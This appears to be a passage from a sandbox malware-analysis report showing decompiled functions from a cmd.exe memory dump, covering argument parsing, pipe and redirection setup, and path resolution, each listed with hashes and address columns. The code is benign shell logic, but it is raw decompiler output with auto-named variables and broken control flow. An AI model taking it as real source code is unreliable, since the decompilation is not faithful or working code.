                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$CurrentDirectory
                                    • String ID:
                                    • API String ID: 168429351-0
                                    • Opcode ID: 10d097d6ebd7d447ee04fbd723f1d90870b57ec9d1276c4b18fcd69d903e8d81
                                    • Instruction ID: 659a171f208aa7f7ccb7f6b7326bde9e71d26b5a2e188439e0af765a3fd8b6fc
                                    • Opcode Fuzzy Hash: 10d097d6ebd7d447ee04fbd723f1d90870b57ec9d1276c4b18fcd69d903e8d81
                                    • Instruction Fuzzy Hash: 4E6156B1A083029FD72CDF69D48466BBBE5BBD8314F14492EF699C3250EB709904CB87
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D5F75, Relevance: 6.2, APIs: 4, Instructions: 183COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 65%
                                    			E011D5F75(void* __ecx) {
				short* _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t22;
				intOrPtr _t24;
				short* _t28;
				void* _t29;
				void* _t30;
				long _t32;
				signed int _t34;
				void* _t35;
				signed int _t38;
				signed int _t39;
				wchar_t* _t40;
				long _t41;
				wchar_t* _t42;
				signed int _t44;
				signed int _t45;
				void* _t46;
				void* _t47;
				wchar_t* _t51;
				wchar_t* _t60;
				signed int _t61;
				signed int _t70;
				void* _t71;
				wchar_t* _t73;
				void* _t75;
				long* _t78;
				long* _t80;
				long _t81;
				void* _t82;
				signed short* _t84;
				wchar_t* _t85;

				_t84 =  *(__ecx + 0x3c);
				if( *0x1213cc9 == 0) {
					_t85 = E011DEA40(_t84, "=", 3);
					_t83 = 0;
					__eflags =  *_t85;
					if( *_t85 == 0) {
						L26:
						return E011F4506( *0x1203834);
					}
					_t73 = _t85;
					_v8 = 0;
					_t46 = 2;
					do {
						_t51 = _t73;
						_t6 =  &(_t51[0]); // 0x2
						_v12 = _t6;
						do {
							_t22 =  *_t51;
							_t51 = _t51 + _t46;
							__eflags = _t22 - _t83;
						} while (_t22 != _t83);
						_t53 = _t51 - _v12 >> 1;
						_t73 = _t73 + (_t51 - _v12 >> 1) * 2 + 2;
						_t24 = _v8 + 1;
						_v8 = _t24;
						__eflags =  *_t73 - _t83;
					} while ( *_t73 != _t83);
					__eflags = _t24 - 3;
					if(_t24 > 3) {
						L40:
						_push(_t83);
						_push(0x232a);
						E011DC5A2(_t53);
						return 1;
					}
					_t53 = _t85;
					_t28 = E011DD7E6(_t53);
					_v8 = _t28;
					__eflags =  *_t28 - 0x3d;
					if( *_t28 != 0x3d) {
						goto L40;
					}
					_t75 = _t53 + 2;
					do {
						_t29 =  *_t53;
						_t53 = _t53 + _t46;
						__eflags = _t29 - _t83;
					} while (_t29 != _t83);
					_v12 = _t53 - _t75 >> 1;
					_t30 = E011E22C0(_t46, _t85);
					__eflags = _v12 + 1;
					E011E1040(_t85, _v12 + 1, _t30);
					_t60 = _t85;
					_t17 =  &(_t60[0]); // 0x2
					_t78 = _t17;
					do {
						_t32 =  *_t60;
						_t60 = _t60 + _t46;
						__eflags = _t32 - _t83;
					} while (_t32 != _t83);
					_t61 = _t60 - _t78;
					__eflags = _t61;
					_t53 = _t61 >> 1;
					if(_t61 == 0) {
						goto L40;
					}
					_t80 = _v8 + 4;
					L14:
					return E011E3A50(_t85, _t80);
				}
				if(_t84 == 0) {
					goto L26;
				}
				_t34 =  *_t84 & 0x0000ffff;
				if(_t34 == 0) {
					goto L26;
				}
				_t53 = _t34;
				_t35 = 0x20;
				_t47 = 2;
				while(_t53 <= _t35) {
					_t84 = _t84 + _t47;
					_t45 =  *_t84 & 0x0000ffff;
					_t53 = _t45;
					_t35 = 0x20;
					if(_t45 != 0) {
						continue;
					}
					break;
				}
				_t83 = 0;
				if( *_t84 == 0) {
					goto L26;
				}
				__imp___wcsnicmp(_t84, L"/A", _t47);
				if(_t35 == 0) {
					return E011D6052( &(_t84[2]));
				}
				__imp___wcsnicmp(_t84, L"/P", _t47);
				if(_t35 == 0) {
					return E011F474C(_t47,  &(_t84[2]), _t71, 0, _t84, __eflags);
				}
				_t38 =  *_t84 & 0x0000ffff;
				if(_t38 == 0x2f) {
					goto L40;
				}
				_t81 = 0x22;
				if(_t38 == _t81) {
					_t85 = _t84 + _t47;
					_t39 =  *_t85 & 0x0000ffff;
					__eflags = _t39;
					if(_t39 == 0) {
						L24:
						_t40 = wcsrchr(_t85, _t81);
						_pop(_t53);
						__eflags = _t40;
						if(_t40 != 0) {
							_t53 = 0;
							 *_t40 = 0;
						}
						goto L11;
					}
					_t70 = _t39;
					_t82 = 0x20;
					while(1) {
						__eflags = _t70 - _t82;
						if(_t70 > _t82) {
							break;
						}
						_t85 = _t85 + _t47;
						_t44 =  *_t85 & 0x0000ffff;
						_t70 = _t44;
						__eflags = _t44;
						if(_t44 != 0) {
							continue;
						}
						break;
					}
					_t81 = 0x22;
					goto L24;
				}
				L11:
				_t41 = 0x3d;
				if( *_t85 == _t41) {
					goto L40;
				}
				_t42 = wcschr(_t85, _t41);
				if(_t42 == 0) {
					return E011F4588(_t85);
				}
				_t2 =  &(_t42[0]); // 0x2
				_t80 = _t2;
				 *_t42 = 0;
				goto L14;
			}






































                                    0x011d5f86
                                    0x011d5f8a
                                    0x011ea9e9
                                    0x011ea9eb
                                    0x011ea9ed
                                    0x011ea9f0
                                    0x011ea9cb
                                    0x00000000
                                    0x011ea9d1
                                    0x011ea9f4
                                    0x011ea9f6
                                    0x011ea9f9
                                    0x011ea9fa
                                    0x011ea9fa
                                    0x011ea9fc
                                    0x011ea9ff
                                    0x011eaa02
                                    0x011eaa02
                                    0x011eaa05
                                    0x011eaa07
                                    0x011eaa07
                                    0x011eaa12
                                    0x011eaa17
                                    0x011eaa1a
                                    0x011eaa1b
                                    0x011eaa1e
                                    0x011eaa1e
                                    0x011eaa23
                                    0x011eaa26
                                    0x011eaa7f
                                    0x011eaa7f
                                    0x011eaa80
                                    0x011eaa85
                                    0x00000000
                                    0x011eaa8e
                                    0x011eaa28
                                    0x011eaa2a
                                    0x011eaa2f
                                    0x011eaa32
                                    0x011eaa36
                                    0x00000000
                                    0x00000000
                                    0x011eaa38
                                    0x011eaa3b
                                    0x011eaa3b
                                    0x011eaa3e
                                    0x011eaa40
                                    0x011eaa40
                                    0x011eaa49
                                    0x011eaa4e
                                    0x011eaa59
                                    0x011eaa5a
                                    0x011eaa5f
                                    0x011eaa61
                                    0x011eaa61
                                    0x011eaa64
                                    0x011eaa64
                                    0x011eaa67
                                    0x011eaa69
                                    0x011eaa69
                                    0x011eaa6e
                                    0x011eaa6e
                                    0x011eaa70
                                    0x011eaa72
                                    0x00000000
                                    0x00000000
                                    0x011eaa77
                                    0x011d6031
                                    0x00000000
                                    0x011d6033
                                    0x011d5f92
                                    0x00000000
                                    0x00000000
                                    0x011d5f98
                                    0x011d5f9e
                                    0x00000000
                                    0x00000000
                                    0x011d5fa6
                                    0x011d5fa8
                                    0x011d5fab
                                    0x011d5fac
                                    0x011d5fb1
                                    0x011d5fb5
                                    0x011d5fb8
                                    0x011d5fbd
                                    0x011d5fbe
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d5fbe
                                    0x011d5fc0
                                    0x011d5fc5
                                    0x00000000
                                    0x00000000
                                    0x011d5fd2
                                    0x011d5fdd
                                    0x00000000
                                    0x011d6042
                                    0x011d5fe6
                                    0x011d5ff1
                                    0x00000000
                                    0x011ea982
                                    0x011d5ff7
                                    0x011d5ffd
                                    0x00000000
                                    0x00000000
                                    0x011d6005
                                    0x011d6009
                                    0x011ea98c
                                    0x011ea98e
                                    0x011ea991
                                    0x011ea994
                                    0x011ea9af
                                    0x011ea9b1
                                    0x011ea9b8
                                    0x011ea9b9
                                    0x011ea9bb
                                    0x011ea9c1
                                    0x011ea9c3
                                    0x011ea9c3
                                    0x00000000
                                    0x011ea9bb
                                    0x011ea998
                                    0x011ea99a
                                    0x011ea99b
                                    0x011ea99b
                                    0x011ea99e
                                    0x00000000
                                    0x00000000
                                    0x011ea9a0
                                    0x011ea9a2
                                    0x011ea9a5
                                    0x011ea9a7
                                    0x011ea9aa
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ea9aa
                                    0x011ea9ae
                                    0x00000000
                                    0x011ea9ae
                                    0x011d600f
                                    0x011d6011
                                    0x011d6015
                                    0x00000000
                                    0x00000000
                                    0x011d601d
                                    0x011d6027
                                    0x00000000
                                    0x011d604b
                                    0x011d602b
                                    0x011d602b
                                    0x011d602e
                                    0x00000000

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsnicmp$wcschr
                                    • String ID:
                                    • API String ID: 3270668897-0
                                    • Opcode ID: 6882690f09108301da322c924d95972048bff093752235bb1f516b1b17fecf5e
                                    • Instruction ID: e21ea13337b8509a8886dbc2996baa5dbb390130eee3705bd4618ba193e3823a
                                    • Opcode Fuzzy Hash: 6882690f09108301da322c924d95972048bff093752235bb1f516b1b17fecf5e
                                    • Instruction Fuzzy Hash: 35519E39200A119BEB2CEBACA86867F77F1EF94644B55445DE8439B2C1FB714E82C391
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DAF70, Relevance: 6.2, APIs: 4, Instructions: 179COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 59%
                                    			E011DAF70(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _t39;
				void** _t40;
				void* _t42;
				signed int _t46;
				void* _t48;
				void* _t50;
				intOrPtr _t54;
				void* _t60;
				void* _t62;
				void* _t65;
				void* _t68;
				long _t75;
				void* _t78;
				signed int _t83;
				void* _t87;
				signed int _t102;
				long _t114;
				void* _t116;
				void* _t117;
				void** _t119;

				_push(__ecx);
				_t39 = _a4;
				_t114 =  *((intOrPtr*)(_t39 + 0x38));
				_t75 =  *((intOrPtr*)(_t39 + 0x3c));
				_t78 = 0x28;
				_t40 = E011E00B0(_t78);
				_t119 = _t40;
				if(_t119 == 0) {
					L27:
					_t42 = 1;
				} else {
					__imp___pipe(_t119, 0, 0x8000);
					if(_t40 != 0) {
						_push(0);
						_push(8);
						E011DC5A2(_t78);
						goto L27;
					} else {
						E011DB15E( *_t119);
						E011DB15E(_t119[1]);
						_t46 =  *0x11fd550; // 0x0
						_t83 = _t46;
						 *0x11fd550 = _t46 + 1;
						if(_t83 != 0) {
							_t48 =  *0x11fd5c0; // 0x0
							 *(_t48 + 0x24) = _t119;
							_t119[9] = _t119[9] & 0x00000000;
							_t119[8] = _t48;
						} else {
							_t119[8] = _t119[8] & _t83;
							 *0x11fd5c4 = _t119;
						}
						_t85 = 1;
						 *0x11fd5c0 = _t119;
						_t50 = E011DDBCE(_t119, 1);
						_t119[3] = _t50;
						if(_t50 == 0xffffffff) {
							_t119[3] = _t119[3] | 0xffffffff;
							L23:
							_push(0);
							L31:
							E011DC5A2(_t85);
							_t87 = 0x2351;
							L32:
							E011F9287(_t87);
							__imp__longjmp(0x120b8b8, 1);
							asm("int3");
							_t102 = (_t87 - 0x20 >> 5) + 1;
							_t54 =  *((intOrPtr*)(0x11fd5d0 + _t102 * 4));
							asm("bts eax, ecx");
							 *((intOrPtr*)(0x11fd5d0 + _t102 * 4)) = _t54;
							return _t54;
						}
						_t85 = _t119[1];
						if(E011DDBFC(_t119[1], 1) == 0xffffffff) {
							goto L23;
						}
						E011DDB92(_t119[1]);
						_t119[1] = _t119[1] & 0x00000000;
						if( *_t114 <= 0) {
							E011DE040(_t114,  &_v8);
						}
						_t116 = E011E0E00(1, _t114);
						if( *0x11fd54c != 0) {
							__imp___get_osfhandle(1);
							DuplicateHandle( *0x11fd54c, 0,  *_t119, 0, 0, 0, 0);
						}
						_t85 = _t119[3];
						if(E011DDBFC(_t119[3], 1) == 0xffffffff) {
							goto L23;
						}
						_t87 = _t119[3];
						E011DDB92(_t87);
						_t119[3] = _t119[3] & 0x00000000;
						if(_t116 != 0) {
							goto L32;
						}
						_t60 =  *0x11fd54c; // 0x0
						_t85 = 0;
						_t119[4] = _t60;
						_t119[6] =  *0x1203838;
						 *0x11fd54c = _t116;
						 *0x1203838 = _t116;
						_t62 = E011DDBCE( *0x1203838, 0);
						_t119[2] = _t62;
						if(_t62 == 0xffffffff) {
							_t119[2] = _t119[2] | 0xffffffff;
							L30:
							_push(_t116);
							goto L31;
						}
						_t85 =  *_t119;
						if(E011DDBFC( *_t119, 0) == 0xffffffff) {
							goto L30;
						}
						E011DDB92( *_t119);
						 *_t119 = _t116;
						if( *_t75 <= _t116) {
							E011DE040(_t75,  &_v8);
						}
						_t65 = E011E0E00(1, _t75);
						_t85 = _t119[2];
						_t117 = _t65;
						if(E011DDBFC(_t119[2], 0) == 0xffffffff) {
							goto L23;
						}
						E011DDB92(_t119[2]);
						_t87 = 0;
						_t119[2] = 0;
						if(_t117 != 0) {
							goto L32;
						}
						 *0x11fd550 =  *0x11fd550 - 1;
						_t68 =  *0x11fd54c; // 0x0
						_t119[5] = _t68;
						_t119[7] =  *0x1203838;
						 *0x11fd54c = 0;
						 *0x1203838 = 0;
						if( *0x11fd550 != 0) {
							_t42 = 0;
						} else {
							_t42 = E011DB183();
						}
					}
				}
				return _t42;
			}
























                                    0x011daf78
                                    0x011daf79
                                    0x011daf7f
                                    0x011daf82
                                    0x011daf87
                                    0x011daf88
                                    0x011daf8d
                                    0x011daf91
                                    0x011f12c3
                                    0x011f12c5
                                    0x011daf97
                                    0x011daf9f
                                    0x011dafaa
                                    0x011f12b8
                                    0x011f12ba
                                    0x011f12bc
                                    0x00000000
                                    0x011dafb0
                                    0x011dafb2
                                    0x011dafba
                                    0x011dafbf
                                    0x011dafc4
                                    0x011dafc7
                                    0x011dafce
                                    0x011db13f
                                    0x011db144
                                    0x011db147
                                    0x011db14b
                                    0x011dafd4
                                    0x011dafd4
                                    0x011dafd7
                                    0x011dafd7
                                    0x011dafe1
                                    0x011dafe2
                                    0x011dafe7
                                    0x011dafec
                                    0x011daff2
                                    0x011f12cb
                                    0x011db157
                                    0x011db157
                                    0x011f12d9
                                    0x011f12de
                                    0x011f12e4
                                    0x011f12e5
                                    0x011f12e5
                                    0x011f12f1
                                    0x011f12f7
                                    0x011f12fe
                                    0x011db171
                                    0x011db178
                                    0x011db17b
                                    0x00000000
                                    0x011db17b
                                    0x011daff8
                                    0x011db006
                                    0x00000000
                                    0x00000000
                                    0x011db00f
                                    0x011db014
                                    0x011db01b
                                    0x011db023
                                    0x011db023
                                    0x011db039
                                    0x011db03b
                                    0x011db047
                                    0x011db055
                                    0x011db055
                                    0x011db05b
                                    0x011db069
                                    0x00000000
                                    0x00000000
                                    0x011db06f
                                    0x011db072
                                    0x011db077
                                    0x011db07d
                                    0x00000000
                                    0x00000000
                                    0x011db083
                                    0x011db088
                                    0x011db08a
                                    0x011db092
                                    0x011db095
                                    0x011db09b
                                    0x011db0a1
                                    0x011db0a6
                                    0x011db0ac
                                    0x011f12d4
                                    0x011f12d8
                                    0x011f12d8
                                    0x00000000
                                    0x011f12d8
                                    0x011db0b2
                                    0x011db0be
                                    0x00000000
                                    0x00000000
                                    0x011db0c6
                                    0x011db0cb
                                    0x011db0cf
                                    0x011db0d7
                                    0x011db0d7
                                    0x011db0e1
                                    0x011db0e6
                                    0x011db0eb
                                    0x011db0f5
                                    0x00000000
                                    0x00000000
                                    0x011db0fa
                                    0x011db0ff
                                    0x011db101
                                    0x011db106
                                    0x00000000
                                    0x00000000
                                    0x011db10c
                                    0x011db113
                                    0x011db118
                                    0x011db120
                                    0x011db123
                                    0x011db129
                                    0x011db12f
                                    0x011db153
                                    0x011db131
                                    0x011db131
                                    0x011db131
                                    0x011db12f
                                    0x011dafaa
                                    0x011db13c

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • _pipe.MSVCRT ref: 011DAF9F
                                      • Part of subcall function 011DDBCE: _dup.MSVCRT ref: 011DDBD5
                                    • longjmp.MSVCRT(0120B8B8,00000001), ref: 011F12F1
                                      • Part of subcall function 011DDBFC: _dup2.MSVCRT ref: 011DDC10
                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                    • _get_osfhandle.MSVCRT ref: 011DB047
                                    • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011DB055
                                      • Part of subcall function 011DE040: memset.MSVCRT ref: 011DE090
                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE0F3
                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE10B
                                      • Part of subcall function 011DE040: _wcsicmp.MSVCRT ref: 011DE179
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
                                    • String ID:
                                    • API String ID: 1441200171-0
                                    • Opcode ID: 6cad21d06427e9c0ae52906e1e5b7ca901d78b711cd73aa69c338ffce1a03d55
                                    • Instruction ID: 4adc1ec5e026a01e762791da8a3d31ae191c7c722cd5859a0596a3743e8a29b3
                                    • Opcode Fuzzy Hash: 6cad21d06427e9c0ae52906e1e5b7ca901d78b711cd73aa69c338ffce1a03d55
                                    • Instruction Fuzzy Hash: CC51BF746047019FDB3CDF79E899A3A77E1EB95328B108A2EE46BC72D4DB30A441CB45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E02B0, Relevance: 6.2, APIs: 4, Instructions: 165COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 88%
                                    			E011E02B0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* _v16;
				signed short* _v20;
				signed short _v24;
				signed short _t29;
				signed int _t30;
				intOrPtr _t31;
				int _t34;
				intOrPtr* _t36;
				intOrPtr _t39;
				int _t47;
				intOrPtr _t48;
				intOrPtr* _t59;
				intOrPtr* _t63;
				signed short _t69;
				signed short* _t70;
				intOrPtr* _t71;
				signed short _t76;
				intOrPtr* _t77;
				signed short _t83;
				void* _t91;
				void* _t95;

				_v8 =  *((intOrPtr*)(_t91 + 4));
				_t95 = (_t91 - 0x00000008 & 0xfffffff8) + 4 - 0x10;
				_t83 = 0;
				_v16 = __ecx;
				_v24 = 0;
				while(1) {
					_t69 =  *0x120faa0;
					_t29 = _t69 & 0x0000ffff;
					_t76 = _t29;
					_v20 = _t29;
					_t30 = _t76 & 0x0000ffff;
					if(_t30 == 0x3e || _t30 == 0x3c) {
						goto L7;
					}
					_t41 = iswdigit(_t69 & 0x0000ffff);
					_t95 = _t95 + 4;
					if(_t41 != 0) {
						_t76 =  *0x120faa2;
						_t41 = _t76 & 0x0000ffff;
						if(_t41 != 0x3e) {
							if(_t41 == 0x3c) {
								goto L7;
							} else {
								goto L4;
							}
						} else {
							goto L7;
						}
					} else {
						L4:
						if(_t83 != 0) {
							if(_v24 == _t83) {
								E011DF300(_t41, 0, 0, 0);
							}
							return 1;
						} else {
							return 0;
						}
					}
					L40:
					L7:
					_t31 = E011E00B0(0x18);
					_t59 = _v16;
					 *_t59 = _t31;
					if(_t31 == 0) {
						 *0x120f980 = 0x234a;
						__imp__longjmp(0x120b940, 1);
						asm("int3");
						if(_t59 <= 0xc42e || _t59 == 0xc431 || _t59 == 0xc433) {
							_t69 = 0;
						}
						return _t69;
					} else {
						 *(_t31 + 0x10) = _t76;
						_t83 = _t83 + 1;
						_v20 = 0x120faa0;
						_t34 = iswdigit( *0x120faa0 & 0x0000ffff);
						_t95 = _t95 + 4;
						_t36 =  *_v16;
						if(_t34 != 0) {
							 *_t36 = ( *0x120faa0 & 0x0000ffff) - 0x30;
							_t63 = 0x120faa2;
						} else {
							_t63 = _v20;
							if(_t76 != 0x3e) {
								 *_t36 = 0;
							} else {
								 *_t36 = 1;
							}
						}
						_t11 = _t63 + 2; // 0x120faa4
						_t70 = _t11;
						_v20 = _t70;
						if( *_t63 !=  *_t70) {
							_t77 = _v16;
						} else {
							if(_t76 == 0x3c) {
								E011F82EB(_t63);
								_t70 = _v20;
							}
							_t77 = _v16;
							_t63 = _t70;
							 *((intOrPtr*)( *_t77 + 0xc)) = 1;
						}
						_t64 = _t63 + 2;
						_v20 = _t64;
						if( *_t64 == 0x26) {
							_t71 = _t64;
							_t22 = _t71 + 2; // 0x120faa2
							_v16 = _t22;
							do {
								_t39 =  *_t71;
								_t71 = _t71 + 2;
							} while (_t39 != 0);
							if(_t71 - _v16 >> 1 != 2) {
								L28:
								E011F82EB(_t64);
							} else {
								_t47 = iswdigit( *(_t64 + 2) & 0x0000ffff);
								_t95 = _t95 + 4;
								if(_t47 == 0) {
									goto L28;
								} else {
									_t48 = E011DDF40(_v20);
									_t64 =  *_t77;
									 *((intOrPtr*)( *_t77 + 4)) = _t48;
									if(_t48 == 0) {
										goto L28;
									}
								}
							}
						} else {
							 *((intOrPtr*)( *_t77 + 4)) = E011DDDCD(_t64);
						}
						if(E011DEEC8() == 0) {
							goto L4;
						} else {
							E011DF030(0);
							_v24 = _v24 + 1;
							_v16 =  *_t77 + 0x14;
							continue;
						}
					}
					goto L40;
				}
			}

























                                    0x011e02c2
                                    0x011e02c8
                                    0x011e02cc
                                    0x011e02ce
                                    0x011e02d2
                                    0x011e02e0
                                    0x011e02e0
                                    0x011e02e7
                                    0x011e02ea
                                    0x011e02ed
                                    0x011e02f0
                                    0x011e02f6
                                    0x00000000
                                    0x00000000
                                    0x011e0301
                                    0x011e0307
                                    0x011e030c
                                    0x011e0321
                                    0x011e0328
                                    0x011e032e
                                    0x011ecad6
                                    0x00000000
                                    0x011ecadc
                                    0x00000000
                                    0x011ecadc
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e030e
                                    0x011e030e
                                    0x011e0310
                                    0x011e03ec
                                    0x011e03f4
                                    0x011e03f4
                                    0x011e0406
                                    0x011e0316
                                    0x011e0320
                                    0x011e0320
                                    0x011e0310
                                    0x00000000
                                    0x011e0334
                                    0x011e0339
                                    0x011e033e
                                    0x011e0341
                                    0x011e0345
                                    0x011ecb00
                                    0x011ecb0a
                                    0x011ecb10
                                    0x011ecb17
                                    0x011e065e
                                    0x011e065e
                                    0x011e065d
                                    0x011e034b
                                    0x011e034b
                                    0x011e035b
                                    0x011e035d
                                    0x011e0360
                                    0x011e0366
                                    0x011e036e
                                    0x011e0370
                                    0x011e0416
                                    0x011e0418
                                    0x011e0376
                                    0x011e0376
                                    0x011e037d
                                    0x011ecae1
                                    0x011e0383
                                    0x011e0383
                                    0x011e0383
                                    0x011e037d
                                    0x011e038c
                                    0x011e038c
                                    0x011e038f
                                    0x011e0395
                                    0x011e0407
                                    0x011e0397
                                    0x011e039b
                                    0x011ecaec
                                    0x011ecaf1
                                    0x011ecaf1
                                    0x011e03a1
                                    0x011e03a4
                                    0x011e03a8
                                    0x011e03a8
                                    0x011e03af
                                    0x011e03b2
                                    0x011e03b9
                                    0x011e0422
                                    0x011e0424
                                    0x011e0427
                                    0x011e0430
                                    0x011e0430
                                    0x011e0433
                                    0x011e0436
                                    0x011e0443
                                    0x011e046c
                                    0x011e046c
                                    0x011e0445
                                    0x011e044a
                                    0x011e0450
                                    0x011e0455
                                    0x00000000
                                    0x011e0457
                                    0x011e045a
                                    0x011e045f
                                    0x011e0461
                                    0x011e0466
                                    0x00000000
                                    0x00000000
                                    0x011e0466
                                    0x011e0455
                                    0x011e03bb
                                    0x011e03c2
                                    0x011e03c2
                                    0x011e03cc
                                    0x00000000
                                    0x011e03d2
                                    0x011e03d4
                                    0x011e03de
                                    0x011e03e1
                                    0x00000000
                                    0x011e03e1
                                    0x011e03cc
                                    0x00000000
                                    0x011e0345

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: iswdigit
                                    • String ID:
                                    • API String ID: 3849470556-0
                                    • Opcode ID: 56c411d0bb0143154565cf3f04d095eab591efeb6e4135075c6b1875747ee49d
                                    • Instruction ID: d09a34828198d013f7ac1bce7e74096f6f9a04199d44658a5ec333314f793b97
                                    • Opcode Fuzzy Hash: 56c411d0bb0143154565cf3f04d095eab591efeb6e4135075c6b1875747ee49d
                                    • Instruction Fuzzy Hash: 4C51D470A046019FDB2DDFE9D59827EB7E1EB88304F15416AE90187381EBB59A82CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E2D22, Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 96%
                                    			E011E2D22(intOrPtr* __ecx, long __edx, WCHAR* _a4) {
				long _v8;
				WCHAR* _v12;
				void* __ebx;
				intOrPtr _t30;
				void* _t31;
				intOrPtr _t35;
				short _t38;
				signed short _t40;
				int _t41;
				long _t46;
				intOrPtr _t49;
				short _t50;
				int _t53;
				intOrPtr* _t60;
				signed int _t62;
				signed short* _t63;
				intOrPtr* _t68;
				signed int _t70;
				void* _t72;
				void* _t75;
				signed short* _t76;
				void* _t78;
				WCHAR* _t80;
				long _t82;
				intOrPtr* _t84;
				signed int _t86;
				signed short* _t87;

				_push(__ecx);
				_push(__ecx);
				_t80 = __ecx;
				_v8 = __edx;
				_t57 = _a4;
				_t53 = 0;
				_t84 = _a4;
				_t3 = _t84 + 2; // 0x2
				_t72 = _t3;
				do {
					_t30 =  *_t84;
					_t84 = _t84 + 2;
				} while (_t30 != 0);
				_t86 = _t84 - _t72 >> 1;
				_t31 = E011E22C0(0, _t57);
				_t4 = _t86 + 1; // -1
				_t87 = _a4;
				E011E1040(_t87, _t4, _t31);
				if(( *_t87 & 0x0000ffff) == 0) {
					E011E36CB(0, __ecx, _v8, 0);
					_t60 = __ecx + 4;
					_t75 = _t60 + 2;
					do {
						_t35 =  *_t60;
						_t60 = _t60 + 2;
					} while (_t35 != 0);
					_t62 = _t60 - _t75 >> 1;
					if(_t62 + 3 < 0x7fe7) {
						if(_t62 != 1) {
							_t38 = 0x5c;
							 *((short*)(__ecx + 4 + _t62 * 2)) = _t38;
							 *((short*)(__ecx + 6 + _t62 * 2)) = 0;
						}
						goto L8;
					}
					 *0x1213cf0 = 3;
					goto L21;
				} else {
					_t63 = _t87;
					_t6 =  &(_t63[1]); // 0x2
					_t76 = _t6;
					do {
						_t40 =  *_t63;
						_t63 =  &(_t63[1]);
					} while (_t40 != 0);
					if(_t63 - _t76 >> 1 == 2) {
						if(_t87[1] != 0x3a) {
							goto L6;
						}
						E011E36CB(0, __ecx, _v8,  *_t87 & 0x0000ffff);
						_t68 = __ecx;
						_t78 = __ecx + 2;
						do {
							_t49 =  *_t68;
							_t68 = _t68 + 2;
						} while (_t49 != 0);
						_t70 = _t68 - _t78 >> 1;
						if(_t70 > 3) {
							_t50 = 0x5c;
							 *((short*)(__ecx + _t70 * 2)) = _t50;
							 *((short*)(__ecx + 2 + _t70 * 2)) = 0;
						}
						L8:
						return _t53;
					}
					L6:
					_t41 = SetErrorMode(_t53);
					SetErrorMode(1);
					_t82 = _v8;
					_v8 = GetFullPathNameW(_a4, _t82, _t80,  &_v12);
					SetErrorMode(_t41);
					_t46 = _v8;
					if(_t46 == 0 || _t46 > _t82) {
						 *0x1213cf0 = 0xce;
						L21:
						_t53 = 1;
					}
					goto L8;
				}
			}






























                                    0x011e2d27
                                    0x011e2d28
                                    0x011e2d2c
                                    0x011e2d2e
                                    0x011e2d31
                                    0x011e2d34
                                    0x011e2d36
                                    0x011e2d38
                                    0x011e2d38
                                    0x011e2d3b
                                    0x011e2d3b
                                    0x011e2d3e
                                    0x011e2d41
                                    0x011e2d48
                                    0x011e2d4a
                                    0x011e2d4f
                                    0x011e2d52
                                    0x011e2d58
                                    0x011e2d63
                                    0x011ed8ed
                                    0x011ed8f2
                                    0x011ed8f5
                                    0x011ed8f8
                                    0x011ed8f8
                                    0x011ed8fb
                                    0x011ed8fe
                                    0x011ed905
                                    0x011ed90f
                                    0x011ed920
                                    0x011ed928
                                    0x011ed929
                                    0x011ed930
                                    0x011ed930
                                    0x00000000
                                    0x011ed920
                                    0x011ed911
                                    0x00000000
                                    0x011e2d69
